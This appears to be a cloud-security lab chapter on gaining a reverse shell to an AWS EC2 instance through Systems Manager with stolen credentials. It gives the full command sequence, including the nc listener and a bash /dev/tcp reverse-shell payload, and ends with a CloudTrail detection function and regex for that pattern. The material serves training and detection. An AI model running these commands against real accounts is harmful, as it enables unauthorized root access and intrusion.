AWS EC2 Reverse Shell via SSM

Introduction

AWS Systems Manager (SSM) is a capability within AWS that allows administrators to manage resources using the AWS CLI or Console by interacting with an agent running on these resources.

We can use SSM to execute commands, connect to an instance through the SSH-style console in the UI, deploy updates, take backups, and perform other administrative tasks.

As an attacker, we can (ab)use SSM to gain a reverse shell to our compute-target so that we can inspect the file system and have access to the network that it can see.

What are we going to cover?

We will use the stolen credentials from the previous chapter and execute a shell script on the compute-target. This shell script will give us shell execution capabilities via a reverse shell that will connect back to our attacker machine.

Executing commands on the target

We will now try to run a command on the compute-target EC2 instance within the environment using the AWS SSM service, accessed via the stolen credentials.

Let us enumerate the instances that have the AWS SSM agent running, using the following command:

aws ssm describe-instance-information --profile stolencreds
(screenshot: describe instance information)

Note the instance ID of the machine on which we will perform command execution using SSM.

Using the instance ID from the describe-instance-information output above, run the following commands:

  • Use the AWS SSM send-command to send a command to the instance and retrieve the command ID, which is needed to read the command's output.

aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
(screenshot: ssm ifconfig)
  • Next, use the AWS SSM list-command-invocations with the command ID to read the output of ifconfig.

aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
(screenshot: ssm command output)

Remember, the AWS SSM agent runs as root/administrator on the EC2 instance; therefore, any command you run through AWS SSM executes with administrative privileges.

Reverse shell using inline script

Since SSM lets us execute commands, we can use it to obtain a shell on the remote system. The AWS-RunRemoteScript document can additionally execute a script hosted on GitHub or in an S3 bucket; the steps below instead pass the script inline through AWS-RunShellScript.

Run these commands from the student machine (the first two steps are performed on the attacker machine that will catch the shell)

  • On the attacker machine, via an SSH terminal, run the following command to add an iptables rule allowing inbound traffic to port 9999

sudo iptables -I INPUT -p tcp -m tcp --dport 9999 -j ACCEPT
  • On the attacker machine where you will catch the reverse shell, start netcat using the following command

nc -nlvp 9999
  • Back on the student machine, run the following command, replacing ATTACKER-INTERNAL-IP with the private IP address of the attacker machine and INSTANCE-ID with that of the target. The attacker machine and the compute target can talk to each other because they are in the same VPC.

aws ssm send-command --instance-ids "INSTANCE-ID" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters 'commands="bash -c \"bash -i >& /dev/tcp/ATTACKER-INTERNAL-IP/9999 0>&1\""' --output text --query "Command.CommandId"
  • A reverse shell will have connected to the netcat listener

(screenshot: reverse shell received)
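Every send-command call above is recorded by CloudTrail as an ssm.amazonaws.com SendCommand event, which is where a defender would catch this activity. The following triage function is an added example, not part of the original lab: it walks constructed CloudTrail-style records (the field layout and the sample ARNs and instance IDs are assumptions) and flags AWS-RunShellScript / AWS-RunRemoteScript invocations by principals outside an allowlist, as well as command parameters matching the /dev/tcp redirect pattern used in this chapter.

```python
import re

# Indicator for the bash /dev/tcp reverse shell shown on this page.
# Extend with your own environment's indicators as needed.
REVERSE_SHELL_RE = re.compile(r"/dev/tcp/|bash\s+-i\b")

# SSM documents that execute attacker-supplied shell content on the instance.
SHELL_DOCUMENTS = {"AWS-RunShellScript", "AWS-RunRemoteScript"}

# Constructed sample events (not real CloudTrail data): a routine inventory
# command from an automation user, then a reverse shell from an unknown user.
SAMPLE_EVENTS = [
    {"eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ops-automation"},
     "requestParameters": {"documentName": "AWS-RunShellScript",
                           "instanceIds": ["i-0exampleaaa"],
                           "parameters": {"commands": ["ifconfig"]}}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/unknown-user"},
     "requestParameters": {"documentName": "AWS-RunShellScript",
                           "instanceIds": ["i-0exampleaaa"],
                           "parameters": {"commands": [
                               'bash -c "bash -i >& /dev/tcp/10.0.0.5/9999 0>&1"']}}},
]


def triage_ssm_events(events, allowed_principals):
    """Return one finding per SendCommand event that either comes from a
    principal not expected to run shell documents or carries a reverse-shell
    pattern in its command parameters."""
    findings = []
    for ev in events:
        if ev.get("eventSource") != "ssm.amazonaws.com" or ev.get("eventName") != "SendCommand":
            continue
        req = ev.get("requestParameters") or {}
        doc = req.get("documentName", "")
        arn = (ev.get("userIdentity") or {}).get("arn", "")
        reasons = []
        if doc in SHELL_DOCUMENTS and arn not in allowed_principals:
            reasons.append(f"{doc} invoked by non-allowlisted principal")
        commands = (req.get("parameters") or {}).get("commands") or []
        if isinstance(commands, str):
            commands = [commands]
        if any(REVERSE_SHELL_RE.search(c) for c in commands):
            reasons.append("reverse-shell pattern in command parameters")
        if reasons:
            findings.append({"principal": arn, "document": doc,
                             "instances": req.get("instanceIds", []),
                             "reasons": reasons})
    return findings
```

Feed it the real events from a CloudTrail lookup or S3 export; any finding with both reasons is worth treating as an active session rather than a policy drift.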
